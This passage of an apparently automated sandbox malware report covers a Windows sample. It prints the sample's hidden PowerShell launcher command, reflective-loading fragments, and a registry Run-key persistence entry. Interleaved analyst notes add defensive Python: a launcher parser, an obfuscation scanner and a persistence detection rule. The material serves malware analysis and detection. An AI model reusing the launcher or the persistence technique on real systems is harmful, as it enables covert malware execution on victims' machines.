          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.pdbh source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb.> source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: em.Core.pdbM source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Numerics.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb, source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr

          Data Obfuscation

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Motherland $Deamidation $Highjacks), (Toozoo @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Direach = [AppDomain]::CurrentDomain.GetAssemblies()$global:So
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiklimakser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amtsgymnasiet, $false).DefineType($Skraasej
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
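Analyst note on the two process-creation lines above (added here; this is not code from the report, from Joe Sandbox or from the sample). The launcher never names the command it runs: it reads Ruralt.Tea, takes 3 characters at offset 69838 and hands them to PowerShell's call operator (`.`), so those characters become the command name and the whole file becomes its argument. The Python below parses that shape out of the command line, resolves the verb against a payload file, and checks an AMSI-logged buffer for the reflection markers quoted above (`GetDelegateForFunctionPointer`, `DefineDynamicAssembly`). The payload file is constructed: filler with `iex` at the offset, which is an assumption, since the real file content is not in the report. The regex targets only this launcher shape and is not a general PowerShell deobfuscator.

```python
import re

# Shape of the launcher seen in the report's process-creation line:
#   $a=Get-Content '<file>';$b=$a.SubString(<off>,<len>);.$b($a)
# The leading "." is PowerShell's call operator, so the <len> characters at
# <off> become the command name and the whole file is passed as its argument.
LAUNCHER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'"
    r".*?\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)"
    r".*?\.\$(?P<verb>\w+)\(\$(?P<payload>\w+)\)",
    re.IGNORECASE | re.DOTALL,
)

# Strings AMSI logged from the same process; they point at reflective
# P/Invoke and in-memory assembly generation rather than ordinary scripting.
REFLECTION_MARKERS = (
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "AssemblyBuilderAccess",
    "DefineDynamicModule",
)


def parse_launcher(cmdline):
    """Pull file path, substring offset and length out of the launcher."""
    m = LAUNCHER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        "verb_var": m.group("verb"),
        "payload_var": m.group("payload"),
    }


def resolve_verb(payload_text, offset, length):
    """Return the characters the launcher will use as the command name.

    PowerShell's SubString indexes UTF-16 code units, which equals Python's
    str index for ASCII payloads. Get-Content without -Raw splits on
    newlines, so the offset only means what it appears to mean when the
    file is a single line; this helper assumes that.
    """
    if offset < 0 or offset + length > len(payload_text):
        raise ValueError("substring lies outside the payload")
    return payload_text[offset:offset + length]


def amsi_markers(scan_content):
    """Which reflection markers appear in an AMSI-logged script buffer."""
    return [m for m in REFLECTION_MARKERS if m in scan_content]


def build_sample_payload(offset, verb="iex", tail_len=16):
    """Constructed stand-in for Ruralt.Tea (not the real file): filler up to
    the offset, the assumed verb, then some filler after it."""
    return "A" * offset + verb + "B" * tail_len


# Command line copied from the report; the payload file is constructed.
REPORT_CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content '
    r"'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';"
    r"$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);"
    r'.$Advokatfuldmgtigs($Mitokoromono)"'
)

if __name__ == "__main__":
    info = parse_launcher(REPORT_CMDLINE)
    payload = build_sample_payload(info["offset"])
    verb = resolve_verb(payload, info["offset"], info["length"])
    print(f"{info['path']} -> command name at {info['offset']}: {verb!r}")
```

On a real host, feed `resolve_verb` the bytes of the file named in the command line (decoded as the file's actual encoding) rather than the constructed filler; if the result is not a recognisable command or alias, the file is probably multi-line or the offset is computed against a different encoding.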
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3D6D1 push ebx; ret 10_2_08C3D6D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C36EF2 push dword ptr [ebx+esi*2]; iretd 10_2_08C36F18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C366F2 push es; retf 10_2_08C366F3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3D69E push 53A2941Bh; ret 10_2_08C3D6AA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C390B0 push 97920D78h; ret 10_2_08C390B5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3CA0C push edx; ret 10_2_08C3CA0D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3B21D push F32D283Ch; retf 10_2_08C3B222
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3B62C push eax; ret 10_2_08C3B637
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C36D61 push ss; ret 10_2_08C36D62
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3DF65 push ebx; ret 10_2_08C3DF72
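The `push ...; ret` / `retf` sequences listed above are what the sandbox's obfuscation heuristic keys on: a push immediately followed by a return redirects control flow to the pushed value, something a compiler does not emit but unpacking stubs and junk-code generators do. Added example, not from the report or from Joe Sandbox: a scanner that finds those byte pairs in a memory region and reports them at their address. The sample buffer is constructed, NOP filler around the byte encodings of several sequences quoted above (for instance `68 1B 94 A2 53 C3` is `push 53A2941Bh; ret`), and the base address used for display is made up.

```python
import struct

# x86 opcodes covering the sequences the sandbox listed for this process
PUSH_IMM32 = 0x68
PUSH_R32 = range(0x50, 0x58)                    # push eax .. push edi
PUSH_SREG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
RETURNS = {0xC3: "ret", 0xCB: "retf"}
REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")


def find_push_ret(buf, base=0):
    """Return (address, text) for every push immediately followed by a return.

    The scan is linear and skips past each hit so the bytes of a pushed
    immediate are not re-interpreted as a second push.
    """
    hits = []
    i, n = 0, len(buf)
    while i < n:
        op = buf[i]
        if op == PUSH_IMM32 and i + 5 < n and buf[i + 5] in RETURNS:
            imm = struct.unpack_from("<I", buf, i + 1)[0]
            hits.append((base + i, f"push {imm:08X}h; {RETURNS[buf[i + 5]]}"))
            i += 6
            continue
        if op in PUSH_R32 and i + 1 < n and buf[i + 1] in RETURNS:
            hits.append((base + i, f"push {REG32[op - 0x50]}; {RETURNS[buf[i + 1]]}"))
            i += 2
            continue
        if op in PUSH_SREG and i + 1 < n and buf[i + 1] in RETURNS:
            hits.append((base + i, f"push {PUSH_SREG[op]}; {RETURNS[buf[i + 1]]}"))
            i += 2
            continue
        i += 1
    return hits


def gadgets_per_kib(buf):
    """Density of push/ret pairs; the cut-off that counts as suspicious is an analyst's choice."""
    if not buf:
        return 0.0
    return len(find_push_ret(buf)) * 1024 / len(buf)


# Constructed buffer: NOP filler around the encodings of sequences quoted in the report.
SAMPLE = (
    b"\x90\x90"
    + bytes.fromhex("681B94A253C3")   # push 53A2941Bh; ret
    + b"\x90\x90\x90"
    + bytes.fromhex("53C3")           # push ebx; ret
    + b"\x90"
    + bytes.fromhex("06CB")           # push es; retf
    + b"\x90\x90"
    + bytes.fromhex("16C3")           # push ss; ret
    + b"\x90"
    + bytes.fromhex("52C3")           # push edx; ret
    + b"\x90"
)

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE, base=0x08C30000):
        print(f"{addr:08X}  {text}")
    print(f"{gadgets_per_kib(SAMPLE):.1f} push/ret pairs per KiB")
```

Run it over a dumped region (the `sdmp` files in a Joe Sandbox archive, or a `.dmp` carved with a memory tool) rather than the constructed sample; isolated hits occur in legitimate code too, so a high density in one region, as the report shows for the 0x08C3xxxx range, is the signal rather than any single pair.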

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Source: C:\Windows\SysWOW64\cmd.exe  Process created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exe  Process created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exe  Process created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exe  Process created: reg.exe
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Source: C:\Windows\SysWOW64\reg.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Preferentialist
          Source: C:\Windows\SysWOW64\reg.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Preferentialist
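Persistence in this run is a Run value (`Preferentialist`) written by reg.exe that cmd.exe spawned, next to a `Partivarerne.scr` dropped into the user's Temp directory by powershell.exe. Added detection example, not from the report or from Joe Sandbox: it evaluates Sysmon-style registry SetValue records and flags autostart values that point into user-writable paths, that name a screensaver or script extension, or that were written by a command-line registry tool. The records are constructed. The report does not show what `Preferentialist` points to, so the first record's data naming the dropped .scr is an assumption, and `ParentImage` is not a field of Sysmon's registry event; the records carry it as an enrichment assumed to be joined from the matching process-creation event.

```python
import ntpath
import re

RUN_KEY_SUFFIXES = (
    r"\Software\Microsoft\Windows\CurrentVersion\Run",
    r"\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# Only Temp is listed under AppData\Local: flagging all of AppData\Local
# would fire on OneDrive, Teams and similar per-user installs.
USER_WRITABLE_MARKERS = (
    r"\AppData\Local\Temp\\",
    r"\AppData\Roaming\\",
    r"\Users\Public\\",
    r"\ProgramData\\",
)
# .scr is a PE that Windows runs like an .exe; the rest are script hosts' inputs.
SUSPICIOUS_EXTENSIONS = {".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}
REGISTRY_TOOLS = {"reg.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def is_run_key(target_object):
    """True when the value's parent key is a Run or RunOnce key in any hive."""
    key = target_object.rsplit("\\", 1)[0].lower()
    return any(key.endswith(s.lower()) for s in RUN_KEY_SUFFIXES)


def launch_path(details):
    """First token of a Run value's data: a quoted path, or text up to the first space."""
    m = re.match(r'"([^"]+)"|(\S+)', details.strip())
    return (m.group(1) or m.group(2)) if m else ""


def assess_registry_event(ev):
    """Reasons a Sysmon-13-style record looks like a malicious autostart (empty = benign)."""
    if ev.get("EventType") != "SetValue" or not is_run_key(ev["TargetObject"]):
        return []
    reasons = []
    target = launch_path(ev["Details"])
    if any(m.lower().rstrip("\\") + "\\" in target.lower() for m in USER_WRITABLE_MARKERS):
        reasons.append("autostart target in user-writable location")
    ext = ntpath.splitext(target)[1].lower()
    if ext in SUSPICIOUS_EXTENSIONS:
        reasons.append(f"autostart target has {ext} extension")
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    if image in REGISTRY_TOOLS:
        reasons.append(f"value written by {image}")
    if image == "reg.exe" and parent == "cmd.exe":
        reasons.append("reg.exe launched through cmd.exe")
    return reasons


def triage(events):
    """(index, reasons) for every record that draws at least one reason."""
    return [(i, r) for i, ev in enumerate(events) if (r := assess_registry_event(ev))]


SID = r"HKU\S-1-5-21-1111-2222-3333-1001"   # constructed user hive path
SAMPLE_EVENTS = [
    {   # mirrors the report's chain; the value data is an assumption
        "EventType": "SetValue",
        "Image": r"C:\Windows\SysWOW64\reg.exe",
        "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
        "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Preferentialist",
        "Details": r"C:\Users\user\AppData\Local\Temp\Partivarerne.scr",
    },
    {   # ordinary per-user autostart written by an installer
        "EventType": "SetValue",
        "Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
    {   # same tooling, but the key is not an autostart key: out of scope
        "EventType": "SetValue",
        "Image": r"C:\Windows\SysWOW64\reg.exe",
        "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
        "TargetObject": SID + r"\Software\Contoso\App\Run\Preferentialist",
        "Details": r"C:\Users\user\AppData\Local\Temp\x.scr",
    },
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["TargetObject"], "->", "; ".join(reasons))
```

The third record shows why the key check comes first: reg.exe writing a `.scr` path under a vendor key is odd but is not an autostart, and keeping that distinction is what stops the rule from paging on every `reg add`. When the real value data is available from the host, pair the hit with the file-creation event for the same path, which in this report is the powershell.exe write of `Partivarerne.scr`.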
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
